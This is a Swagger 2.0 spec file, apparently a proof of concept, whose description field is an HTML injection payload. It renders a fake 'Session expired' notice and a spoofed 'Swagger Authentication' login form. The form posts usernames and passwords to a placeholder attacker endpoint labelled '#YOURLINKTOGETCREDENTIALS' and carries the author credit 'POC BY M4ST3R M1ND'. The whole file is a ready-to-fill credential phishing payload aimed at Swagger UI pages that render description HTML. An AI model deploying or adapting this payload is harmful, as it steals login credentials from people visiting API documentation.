swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: '
<div class="login-form">

<!-- Error Message -->
<div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #d4edda; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
  <div style="background-color: #d4edda; color: #155724; padding: 16px 20px; border-radius: 4px; border: 1px solid #c3e6cb; font-size: 16px; text-align: center;">
    <strong>Session expired. Please login again.</strong>
  </div>
</div>

<!-- Login Form -->
<div class="heading">
  <h1 style="text-align: center; font-size: 24px; color: #2c3e50; margin-bottom: 20px;">Swagger Authentication</h1>
  <div class="form-container" style="width: 100%; max-width: 400px; margin: 0 auto; padding: 20px; background: #ffffff; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
    <form action="#YOURLINKTOGETCREDENTIALS" method="post" class="form-signin">
      <div class="form-group" style="margin-bottom: 15px;">
        <label for="username" style="font-size: 14px; color: #333; display: block; margin-bottom: 5px;">Username</label>
        <input type="text" name="username" size="20" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;">
      </div>
      <div class="form-group" style="margin-bottom: 15px;">
        <label for="password" style="font-size: 14px; color: #333; display: block; margin-bottom: 5px;">Password</label>
        <input type="password" name="password" size="20" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;">
      </div>
      <div class="form-group" style="margin-top: 20px;">
        <button type="submit" class="btn btn-default" style="width: 100%; padding: 12px; background-color: #5cb85c; border: none; color: white; font-size: 16px; border-radius: 4px; cursor: pointer;">Login</button>
      </div>
    </form>
  </div>
</div>

<!-- Footer with your name -->
<div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
  POC BY M4ST3R M1ND
</div>
  '
paths:
  /:
    post:
      responses:
        '200':
          description: Login Successful
